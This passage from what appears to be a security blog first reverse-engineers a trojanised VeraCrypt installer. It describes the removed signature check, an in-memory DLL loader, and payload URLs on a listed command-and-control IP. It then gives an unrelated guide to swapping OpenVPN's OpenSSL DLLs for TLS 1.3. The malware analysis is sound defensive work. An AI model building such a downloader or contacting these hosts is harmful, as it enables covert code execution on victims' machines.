The biggest difference is in sub_4236F0 (real) / sub_421540 (fake). The real function is populated with 100+ lines of decompiled code, while the fake installer’s version simply consists of “return 1;“.

These functions are called from the main function as follows.

Call to the function that’s modified in the fake installer

The string “DIST_PACKAGE_CORRUPTED” led me to a line in VeraCrypt source code in Setup.c that gives me the name of this function: VerifyModuleSignature.

VerifyModuleSignature is an addition in VeraCrypt compared to TrueCrypt, which verifies that the signing certificate used to sign the binary is the genuine VeraCrypt’s certificate, by comparing its hash against a hardcoded value. That should have pissed the malware author, who went the extra mile to re-sign the modified installer with a valid EV code signing certificate, and could not run the installer without modification 🙂

Next, the functions write_string, write_string_0 and other statically-linked libraries seem to be functionally the same, but technically a slightly different. They are most likely fine. The differences could be explained by the mismatch between the version of the compiler used for the official and fake builds.

Finally, sub_41ABF0 / sub_41AC50 is a VeraCrypt function responsible for checking whether the system boots with EFI/GPT or not. I was able to identify the function thanks to hardcoded error messages pointing to GetSystemDriveConfiguration. Due to code inlining, the source code looks much more concise than the actual generated code. That makes the identification of differences more difficult. Nevertheless, I was able to understand the few small differences I found.

One difference resides in the code generated for .str(). Again, this has to do with compiler versions. Another one also probably has to do with a library, but I was unable to confirm. The location of this difference, in GetSystemDriveConfiguration (a low interest function), probably indicates this is just an artifact of the compilation rather than a motivated change. The difference in the decompiled code is shown below.

Official (left) and fake (right) installer’s main difference in GetSystemDriveConfiguration

So, essentially, the installer code is the same as the official one, minus the signature certificate check.

Different extracted files

Now, let’s run the installer to extract its files. I often use Sandboxie to run those kind of unknown executables, but there’s always a risk it grabs real info from my system when it runs and sends it away. So in this case, I prefer to run it inside a virtual machine, on a fresh install of Windows.

Let’s extract VeraCrypt files from the fake installer

Next, we continue to compare the extracted files against the official VeraCrypt v1.23 files. However, most of them are different… This could be explained by a different way of compiling VeraCrypt, in which case I might need to figure out which version of the compiler and environment settings were used. That could be a pretty painful process.

Comparing the official (left) with the fake (right) extracted files (v1.23). Ignore the timestamps. Red files means they differ, black files mean they are the same.

Before I start the endeavor of recompiling VeraCrypt with different configurations, how about we check the extracted files’ version info again? Good hunch, the versions of the extracted files do not match. While the fake installer corresponds to v1.23, the extracted files are actually from v1.23-Hotfix2. Go figure who repackaged this with the wrong installer…

Official veracrypt.inf v1.23 (left), fake veracrypt.inf v1.23-Hotfix2 (right)

OK, let’s compare with VeraCrypt v1.23-Hotfix2 extracted files then:

Comparing the official (left) with the fake (right) extracted files (v1.23-Hotfix2). Ignore the timestamps.

Now, only VeraCrypt.exe and VeraCrypt-x64.exe differ. We are getting closer…

Modified VeraCrypt[-x64].exe

Firing IDA Pro and BinDiff, I was able to identify mismatching functions inside VeraCrypt-x64.exe. Most functions matched, except for few ones.
Note: I did the same exercise with VeraCrypt.exe and found similar results, so I’ll skip the analysis here.

BinDiff output showing at least three to four dissimilar functions

Let’s start with the most different function, with a similarity score of 0.00: sub_140001900 in the fake installer.

What you see in this function is something you do not want to see in an application like VeraCrypt: it wants to connect to a server. Note the first condition on the result of sub_140001780, which is already identified with BinDiff as another mismatching function (second-to-last in the list).

Parts of sub_140001900

The result of sub_140001780 is simply the result of calling InternetCrackUrlA on the argument to the function, which basically splits parts of the URL (yes, it’s a legitimate Windows function, despite the name). So this condition will always work if the URL is good.

sub_140001780

So what’s the URL? The function sub_140001900 is called by sub_140001E00, the third-to-last function identified by BinDiff. And here is your URL passed as argument!

Parts of sub_140001E00

Let’s rename the functions with the knowledge we gained so far.
sub_140001900 is basically in charge of fetching a URL, let’s call it download_file.
sub_140001780 parses a URL, it’ll be called crack_url.

Now let’s dig further into sub_140001E00 to understand what it does with the downloaded file. From my understanding, it simply is a PE loader: it makes sure the file is a Windows binary (checks for MZ and PE signatures), copy the content to a newly allocated memory region, parses the file’s import table to load the required DLLs into memory and provide their addresses, then it passes control to the file’s entry point.

Verifying the file is a valid Windows executable (annotations are mine) in sub_140001E00

We will therefore rename sub_140001E00 to download_and_run_dll. In turn, this function is called by a StartAddress function.

StartAddress

StartAddress is called from the main (wWinMain) as a new thread, which keeps running thanks to the infinite loop. Note the addition of StartAddress compared to the official VeraCrypt’s main function.

Modified and original wWinMain functions in TrueCrypt-x64.exe

What’s in getdll.php?

At this point, it is clear that the modified VeraCrypt’s main binary has been added with a downloader that fetches a remote payload hosted at 188.225.35.8.

The DLL returned from /getdll.php is a pretty verbose piece of code that further fetches other payloads and places them in a folder in %AppData%, named after some unique identifier returned from a request to /id.php.

To fetch the payloads, the “getdll” DLL comes with its own small HTTP client.

HTTP client in the DLL returned from getdll.php

It proceeds to do a POST request to various URLs while sending the data “geo”.

Fetching further payloads and writing them to disk

Eventually, the payloads will look like this on disk:

Dropped payloads in %AppData%
Dropped payloads in %AppData%\[ID]

The mapping between URLs and filenames is as follows:

  • 188.225.35.8/work/?work <-> [ID]\[ID].exe
  • 188.225.35.8/work/?code <-> [ID]\big_log
  • 188.225.35.8/work/?data=[ID] <-> [ID]\data
  • 188.225.35.8/work/?service <-> [ID]\pulse
  • 188.225.35.8/work/?check <-> [md5(username)].dll

pulse is encrypted when written to disk, by simply XORing the content with the [ID].

sub_180001E50 in getdll DLL

Similarly, the file proxy.txt contains the string “veracrypto.com” XORed with the [ID], and the file mask.txt contains the encrypted string “%d_yq_%02u.%02u.%02u”. data is also encrypted the same way, this time by the server (recall the ?data=[ID] argument). Finally, so that it knows which unique ID was picked, the ID is kindly written in the id.txt file in %AppData%. If the file is present, getdll will not fetch again these DLLs.

In the next parts of this write-up, I will cover what’s included in those multiple payloads, and how I emulated the malicious server as it stopped serving the malicious payloads due to the complaint addressed to its hosting provider. Stay tuned!

Update: Part 2 deals with plenty of obfuscation and anti-analysis techniques in the payloads.

OpenVPN 2.4.8 still does not support TLS 1.3 & how to fix it on Windows

OpenVPN is a client and server VPN implementation that runs on multiple platforms. It establishes a virtual network over a channel secured by TLS. In 2020, you would expect it to support the latest TLS protocol. Well, no. But we can fix that (at least on Windows).

Update: On April 17, version 2.4.9 was released with an up-to-date OpenSSL that supports TLS 1.3. The current tutorial is still useful to update the OpenSSL library of OpenVPN that may get outdated. As a matter of fact, a security fix for OpenSSL (v1.1.1g) was released just 4 days after the latest OpenVPN release, which remains unpatched as of May 2nd, 2020 unless you proceed to update the library.

OpenVPN and OpenSSL versions

The latest version of OpenVPN for Windows as of February 2020 is v2.4.8 and was released on October 31st, 2019.

In v2.4.5 (April 2018), the support for TLS 1.3 (finalized in August 2018) was already visible from the changelog:

Add support for TLS 1.3 in --tls-version-{min, max}

In v2.4.7, the support was clearly advertised: “One of the big things is enhanced TLS 1.3 support.“, one can read.

However, if you proceed to download and install OpenVPN for Windows (either the Win7 or Win10 installer), you will find that it comes with older OpenSSL DLLs. Namely, with v1.1.0l that was released in September 2019.

If you are not familiar with OpenSSL versions, you should know that several branches are maintained in parallel.

  • v1.0 is the oldest branch still supported. It does not and will never support TLS 1.3.
  • v1.1.0 is a more recent branch that changed a lot of internal stuff, and the API is incompatible with earlier versions. Switching from v1.0 to v1.1.0 requires some code changes in the application. However, this branch does not support TLS 1.3 yet. The good thing is that it’s been made in such a way that an application compatible with this version can simply upgrade to v1.1.1 with no code rewrite needed.
  • v1.1.1 is just v1.1.0 with the added support for TLS 1.3.

Why does OpenVPN not include OpenSSL v1.1.1? You may wonder when was this version of OpenSSL released? Well, that was back in September 2018! So I really don’t see any reason why they would package a version of OpenSSL dated from 2019 but from the v1.1.0 branch. Like, why??

One notable advantage of using TLS 1.3 with OpenVPN, is that when your server runs with mutual authentication, the client certificates are sent to the server in an encrypted form and are no longer in plaintext on the wire. That means someone passively looking at your traffic (e.g., airport’s WiFi hotspot, ISP), may no longer recognize you are Alice or Bob based on your certificate. I think that’s already a good plus for privacy, and there is no reason you shouldn’t benefit from it right now.

I complained about this on Twitter, but didn’t get a reply from @OpenVPN.

Let’s fix it

OpenVPN bundles OpenSSL as DLLs, meaning you can replace the OpenSSL component without touching the OpenVPN executable. In %ProgramFiles%\OpenVPN\bin, you can find the two OpenSSL DLLs: libssl-1_1-x64.dll and libcrypto-1_1-x64.dll.

Going to the properties of these files, you can see the outdated version of OpenSSL.

Original libcrypto-1_1-x64.dll v1.1.0l installed by OpenVPN 2.4.8 for Windows 10

Now, we want to replace these DLLs with more recent ones from the v1.1.1 branch. The most paranoid solution would be to download the source code from openssl.org and compile it ourselves. This is not the easiest solution, though. More realistically, I like OpenSSL’s wiki suggestion of a third-party that provides reproducible builds: https://bintray.com/vszakats/generic/openssl.

Go and download the latest version in the v1.1.1 branch, today would be openssl-1.1.1d-win64-mingw.zip. Identify the two DLLs in the archive and overwrite the ones in OpenVPN’s installation folder. You should end up with something like this (note that the replaced DLLs are older, as indicated from the “Date modified” column): compiled earlier, but from a newer version, that is.

Verify the properties of the newer DLLs:

Newer libcrypto-1_1-x64.dll v1.1.1d from https://bintray.com/vszakats/generic/openssl

You may now (re)start OpenVPN, and enjoy a version of OpenSSL that lets you negotiate TLS 1.3 with a server (if compatible).

OpenVPN v2.4.8 running with OpenSSL v1.1.1d on Windows 10 x64
Running OpenSSL 1.1.1d, OpenVPN can negotiate TLS 1.3 with a compatible server

Voilà! Don’t forget to keep OpenVPN up-to-date, and if it still doesn’t come with the right version of OpenSSL, re-do this step again.

The Android OpenVPN app is also stuck at TLS 1.2, but I haven’t figured out a way to fix it. If you have one, please let me know.

In another post, I will go over a proper configuration for OpenVPN server, because there are plenty of misleading and outdated beliefs on this topic.